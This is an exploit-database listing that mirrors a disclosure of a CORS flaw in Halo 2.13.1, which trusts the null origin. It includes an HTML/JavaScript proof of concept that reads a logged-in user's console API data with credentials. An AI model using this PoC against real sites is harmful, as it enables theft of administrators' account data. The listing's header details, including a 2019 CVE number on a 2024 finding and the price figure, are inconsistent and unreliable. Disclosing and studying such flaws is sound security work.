Advertisement






HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

CVE Category Price Severity
CVE-2019-7164 CWE-201 $15,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-03-16
CPE
cpe:/a:halo:web_app:2.13.1
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8344 0.9546

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030033

Below is a copy:

HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null
The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or malicious fishing domain with a specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:
```HTML
<html>
<body>
<center>
<h2>CORS POC Exploit
<h3>Extract SID

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here
</div>

<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>

</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:
00:25:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum